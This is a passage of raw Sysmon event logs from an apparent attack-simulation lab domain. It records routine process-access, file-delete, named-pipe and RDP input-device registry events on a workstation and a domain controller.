em32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292499Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.826{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292498Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.826{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1900-00000000BB01}1844C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292497Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.795{BEA10069-D0C2-6086-1500-00000000BB01}11041328C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292496Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.764{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0F2A-00000000BB01}6800C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292495Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.764{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-028B-6088-0F2A-00000000BB01}6800C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292494Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.764{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0F2A-00000000BB01}6800C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292493Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.610{BEA10069-D0C2-6086-1500-00000000BB01}11041328C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292492Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.594{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C7FB5267D4579FBC9B6801A1A6D1E0D,SHA256=EE4688B70DB4A16C3522B4B045A6310E98AE6A555D26AE19E6B4ECAD424CD270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440946Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.998{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5367BC431976586B2AF380693C841565,SHA256=F2479AFBA29E1C580554A0A2B91F86D008BF8C97234BFB6FC5A13749A21E4149,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440945Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.969{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440944Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.969{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440943Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.958{42DC5269-D4D0-6086-FD04-00000000BA01}1144ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpgMD5=B5E3DF90456C7074BB6D1F02409C0980,SHA256=3F30B0B3C32AA16451DE80752F3819A6ECDF939185868065679C49436B901739,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440942Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.957{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440941Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.957{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440940Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.957{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440939Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.957{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000440938Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:43.945{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 17141700x8000000000000000440937Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-CreatePipe2021-04-27 12:24:43.945{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000440936Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.944{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 23542300x8000000000000000440935Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.929{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEC7F00F309B1EDE5D111B1584762234,SHA256=F0D886E24E27B8C534C0A13D9ECC5F1E665FC740D9A9A8CED2EA7D851A7CFE48,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440934Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.897{42DC5269-D4CC-6086-E904-00000000BA01}47842156C:\Windows\system32\csrss.exe{42DC5269-CE98-6086-0C00-00000000BA01}840C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\winsrv.DLL+7de7|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440933Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.897{42DC5269-D4CC-6086-E904-00000000BA01}47842156C:\Windows\system32\csrss.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x8000000000000000440932Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.895{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000440931Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.895{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000440930Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.895{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x8000000000000000440929Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.895{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000440928Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.895{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x8000000000000000440927Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.895{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x8000000000000000440926Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.893{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000440925Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.893{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000440924Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.893{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x8000000000000000440923Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.893{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000440922Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.893{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x8000000000000000440921Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.893{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 10341000x8000000000000000440920Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.887{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CC-6086-EA04-00000000BA01}2548C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440919Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.887{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-D4CC-6086-EA04-00000000BA01}2548C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440918Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.874{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440917Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.873{42DC5269-CE99-6086-1500-00000000BA01}12002004C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440916Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.873{42DC5269-CE99-6086-1500-00000000BA01}12001256C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C628-00000000BA01}1280C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 